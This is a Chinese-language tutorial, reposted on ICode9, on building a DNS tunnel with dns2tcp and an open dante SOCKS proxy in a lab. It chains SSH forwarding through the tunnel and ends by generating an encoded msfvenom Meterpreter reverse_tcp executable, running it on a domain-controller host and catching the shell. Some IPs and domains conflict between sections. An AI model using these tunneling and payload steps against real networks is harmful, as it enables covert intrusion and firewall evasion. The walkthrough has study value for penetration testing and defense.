ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Dns2tcp隧道

2022-05-08 00:05:24  阅读:213  来源: 互联网

标签:隧道 dns2tcpd 端口 6666 ssh DNS 0.0 Dns2tcp


0x01 dns2tcp绕过的原理

dns2tcp是一款基于c/s架构的软件,它可以将通信报文夹藏在udp协议的TXT解析记录中,进而形成dns隧道。dns隧道通过dns2tcpc对本地端口的监听,实现端口转发,进而对远程主机上的应用端口进行访问。大致了解了原理,下面我们通过一个模拟实验来学习一下dns2tcp隧道的应用。

由上图可知,本实验的主要配置有两方面,一个是DNS服务器的配置(此处已完成该方面配置,配置信息如下,由于资源有限,故在攻击机Kali上直接集成了DNS服务器),另一个是dns2tcp的客户端和服务端的配置。

攻击机Kali
    IP:10.10.10.10
    DNS:10.10.10.100
DNS服务器:
    域名:abc.qianxin.com IN NS www.qianxin.com    www.qianxin.com IN A 10.10.10.100
内网机:已开启防火墙
    IP:10.10.10.20
    DNS:10.10.10.100

0x02 Dns2tcpd配置

现在Kali Linux上均安装了Dns2tcp工具,我们需要修改的配置文件在/etc/dns2tcpd.conf文件

listen = 0.0.0.0
port = 53               //本地监听53端口,实现DNS的udp数据报通信
# If you change this value, also change the USER variable in /etc/default/dns2tcpd
user = nobody
chroot = /tmp
domain = test.redwand.com          //domain变量定义了DNS隧道通过的查询区域
resources = ssh:127.0.0.1:22 , smtp:127.0.0.1:25 , socks:127.0.0.1:7777   //定义了将远程某个资源转发到dns2tcpc端
key = pass  //密码

通过以下名单启动dns2tcp服务端,实现dns2tcpd服务端监听,其中-d参数表示debug级别为1,-F参数表示前台运行。

dns2tcpd -F -d 1 -f /etc/dns2tcpd.conf

在资源里我们设置了socks,但这个是需要我们自己配置的,所以我们使用dante-server搭建socks

apt-get install dante-server

安装完成后,我们打开配置文件/etc/danted.conf进行修改,配置了一个监听端口7777的socks代理,无身份认证,允许任何客户端连接

logoutput: /var/log/sockd.log
internal: eth0 port = 7777
external: eth0
socksmethod: username none
user.privileged: proxy
user.unprivileged: nobody
client pass {
    from: 0.0.0.0/0 port 1-65535 to: 0.0.0.0/0
}
socks pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
    protocol: tcp udp
}

接下来,我们通过命令启动dante,命令如下

systemctl start danted  //启动
systemctl status danted   //查看状态

0x03 Dns2tcpc配置

客户端首先要设置DNS,这里需要修改/etc/resolv.conf文件(此处尤其重要,需通过文件检查)

nameserver 10.91.40.40

然后在内网机上执行命令即可实现DNS隧道,-c参数表示压缩传输数据,-r表示访问dns2tcpd一端的哪种资源,-z表示通过某个域查询实现

dns2tcpc -c -k hopeamor -l 2222 -d 1 -r ssh -z abc.qianxin.com

然后新开窗口,输入以下命令,成功返回即成功,前提是客户端已开启ssh服务且允许用户登录

ssh root@127.0.0.1 -p 2222

工具通过配合使用,往往能够产生更大的效果,SSH本身是可以进行动态端口转发的,也就是能够配置浏览器进行代理上网,具体命令如下

ssh -CfNg -D 8080 root@127.0.0.1 -p 2222 

由于该命令并不会显示具体情况,我们可通过下列命令查看是否成功

netstat -pantu

可以在kali上生成ma.exe,监听在172.16.1.11的6666端口上

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.11 lport=6666 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe -o ma.exe

然后在172.16.1.11上通过dns隧道嵌套ssh隧道实现本地端口转发

ssh -CfNg -L 6666:192.168.3.29:6666 root@127.0.0.1 -p 2222

最后在kali(192.168.3.29)上开启msf监听6666端口,在DCserver(172.16.1.12)上运行ma.exe,成功得到上线meterpreter shell。

msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 6666
lport => 6666
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:6666 
[*] Sending stage (180291 bytes) to 192.168.3.29
[*] Meterpreter session 1 opened (192.168.3.29:6666 -> 192.168.3.29:55050) at 2021-01-16 22:22:16 -0500

meterpreter > 

标签:隧道,dns2tcpd,端口,6666,ssh,DNS,0.0,Dns2tcp
来源: https://www.cnblogs.com/HOPEAMOR/p/16244562.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有